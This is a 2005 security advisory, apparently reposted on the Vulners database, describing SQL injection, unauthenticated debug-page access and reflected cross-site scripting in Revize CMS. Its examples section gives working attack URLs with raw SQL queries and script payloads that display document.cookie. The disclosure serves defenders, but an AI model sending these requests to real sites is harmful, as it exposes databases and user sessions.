Vulners
Lucene search
revizeSQL.txt
` #######################################################
Revize(r) CMS SQL information disclosure and XSS
Vendor url:http://www.idetix.com
Advisore:http://lostmon.blogspot.com/2005/11/
revizer-cms-sql-information-disclosure.html
Vendor notify: exploit available:yes
#######################################################
The Revize(r) Web Content Management System enables
non-technical content contributors to quickly and easily
keep their Web Pages up-to-date. Revize can be applied
to a sophisticated, mature site or to the development of
a new Web Site from the ground up. And Revize is powerful
enough to manage Web content for any large organization.
Or, Revize can be localized into one or more departments.
The Input passed to the "query" parameter in "query_results.jsp"
isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
This may allow a remote attacker execute or manipulate SQL
queries in the backend database.
a remote user can obtain sensitive data , about the target
system if the attacker request directly ' revize.xml '
located in ' conf ' directory...the normal url for this flaw is:
http://[victim]/revize/conf/
#################
version
#################
unknow version of Revize(r) CMS
##################
solution
##################
No solution at this time.
###################
Timeline
###################
Discovered: 02-11-2005
vendor notify:14-11-2005
vendor response:
disclosure:16-11-2005
#######################
examples
#######################
SQL command:
http://[Victim]/revize/debug/query_results.jsp?
webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects
http://[Victim]/revize/debug/query_results.jsp?query=
select%20*%20from%20pbpublic.rSubjects
http://[Victim]/revize/debug/query_input.jsp?
table=rSubjects&apptable&webspace=REVIZE
¿Admin Bypass ?
http://[Victim]/revize/debug/
wen we are in this url , the page have a login form for
accessing, but if we click in any link we can obtain some
relevant information about the site and we don´t need a login.
http://[Victim]/revize/debug/apptables.html
http://[Victim]/revize/debug/main.html
#####################
cross site scripting
#####################
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap
=subject&error=admincenter/login.jsp
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=security
&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&error=admincenter/login.jsp
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&action=login&resourcetype=security&objectmap
=subject&error=admincenter/login.jsp
################### nd ############################
thnx to estrella to be my ligth
atentamente:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Nov 2005 00:00Current
7.4High risk
Vulners AI Score7.4